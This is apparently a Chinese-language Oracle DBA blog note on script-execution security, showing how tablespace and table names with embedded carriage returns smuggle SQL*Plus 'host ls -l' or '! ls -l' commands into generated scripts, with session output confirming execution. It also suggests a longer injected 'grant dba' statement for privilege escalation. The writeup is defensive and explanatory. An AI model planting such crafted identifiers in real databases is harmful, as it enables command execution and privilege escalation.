[20171219]脚本执行的安全性.txt
--//昨天检查发现应用中存在一个奇怪的表名,存在怪字符,我估计维护者不熟悉vi操作,导致这种情况出现.
--//最近一直在关注安全方面的信息,这方面一直是自己的弱项,要防别人攻击,必须知道别人如何攻击的.
--//看了一些黑客脚本,突然想起利用特殊的表名也许能实现某种"攻击".通过例子说明:
1.环境:
SYS@book> @ &r/ver1
PORT_STRING VERSION BANNER
------------------------------ -------------- --------------------------------------------------------------------------------
x86_64/Linux 2.4.xx 11.2.0.4.0 Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
SCOTT@book> alter tablespace tea rename to "USERS^Mhost ls -l^M";
SCOTT@book> alter tablespace tea rename to "USERS
host ls -l";
2
Tablespace altered.
--//注:里面的^M通过ctrl+v ctlr+q输入在linux下.
SCOTT@book> select * from dba_tablespaces;
TABLESPACE_NAME BLOCK_SIZE INITIAL_EXTENT NEXT_EXTENT MIN_EXTENTS MAX_EXTENTS MAX_SIZE PCT_INCREASE MIN_EXTLEN STATUS CONTENTS LOGGING FOR EXTENT_MAN ALLOCATIO PLU SEGMEN DEF_TAB_ RETENTION BIG PREDICA ENC COMPRESS_FOR
--------------- ---------- -------------- ----------- ----------- ----------- ---------- ------------ ---------- --------- --------- --------- --- ---------- --------- --- ------ -------- ----------- --- ------- --- ------------
SYSTEM 8192 65536 1 2147483645 2147483645 65536 ONLINE PERMANENT LOGGING NO LOCAL SYSTEM NO MANUAL DISABLED NOT APPLY NO HOST NO
SYSAUX 8192 65536 1 2147483645 2147483645 65536 ONLINE PERMANENT LOGGING NO LOCAL SYSTEM NO AUTO DISABLED NOT APPLY NO HOST NO
UNDOTBS1 8192 65536 1 2147483645 2147483645 65536 ONLINE UNDO LOGGING NO LOCAL SYSTEM NO MANUAL DISABLED NOGUARANTEE NO HOST NO
TEMP 8192 1048576 1048576 1 2147483645 0 1048576 ONLINE TEMPORARY NOLOGGING NO LOCAL UNIFORM NO MANUAL DISABLED NOT APPLY NO HOST NO
USERS 8192 65536 1 2147483645 2147483645 65536 ONLINE PERMANENT LOGGING NO LOCAL SYSTEM NO AUTO DISABLED NOT APPLY NO HOST NO
EXAMPLE 8192 65536 1 2147483645 2147483645 65536 ONLINE PERMANENT NOLOGGING NO LOCAL SYSTEM YES AUTO DISABLED NOT APPLY NO HOST NO
USERS 8192 65536 1 2147483645 2147483645 65536 ONLINE PERMANENT LOGGING NO LOCAL SYSTEM NO MANUAL DISABLED NOT APPLY NO HOST NO
host ls -l
7 rows selected.
--//像以前hot backup脚本,通过sql脚本拼接的sql语句.
alter tablespace <tbs_name> begin backup ;
--//如上就变成了.这样调用脚本可能导致后面语句的执行,我这里执行ls -l.
alter tablespace USERS
host ls -l
--//假如我建立的对象是:
create table "emp;^M host ls -l^M" (a number);
--//如果通过某种方式生成的脚本可能就会执行ls -l命令.
--//这样你要看toad生成或者执行的脚本,都是使用引号包裹对象是有道理的.
create table "emp^M ! ls -l^M" (a number);
insert into "emp^M ! ls -l^M" values (1000);
select * from "emp^M ! ls -l^M" ;
SCOTT@book>select * from "emp^M ! ls -l^M" ;
A
----------
1000
--//如果手工打入如下使用双引号把内容包括起来,也是可以正确执行的:
SCOTT@book> select * from "emp
2 ! ls -l
3 "
4 /
A
----------
1000
--//测试插曲,如果你不小心把命令打错,可能是很危险的行为,如下,我这里create变成crate:
SCOTT@book> crate table "emp^M ! ls -l^M" (a number);
SCOTT@book> crate table "emp
! ls -l
" (a number);
SP2-0734: unknown command beginning "crate tabl..." - rest of line ignored.
SCOTT@book> total 152
lrwxrwxrwx 1 oracle oinstall 9 Aug 15 2016 0729 -> /u01/0729
-rw-r--r-- 1 root root 104857600 Nov 17 11:36 100m
-rw-r--r-- 1 oracle oinstall 54 Nov 16 11:42 aaa.txt
-rwxr-xr-x 1 oracle oinstall 532 Nov 16 11:14 aa.sh
-rw-r--r-- 1 oracle oinstall 6 Nov 13 16:18 aa.txt
-rw-r--r-- 1 oracle oinstall 8763 Dec 18 09:54 a.lst
SCOTT@book> SP2-0734: unknown command beginning "" (a numbe..." - rest of line ignored.
--//这样ls -l命令就执行了.连测试也要小心!!
--//12c支持更长的表名达到128字符(11g支持的表名才30字符),这样可以打入更长的命令,比如grant dba to a IDENTIFIED BY a1;
--//这样建立用户a具有dba权限.
--//不要在生产系统做这样的测试!!
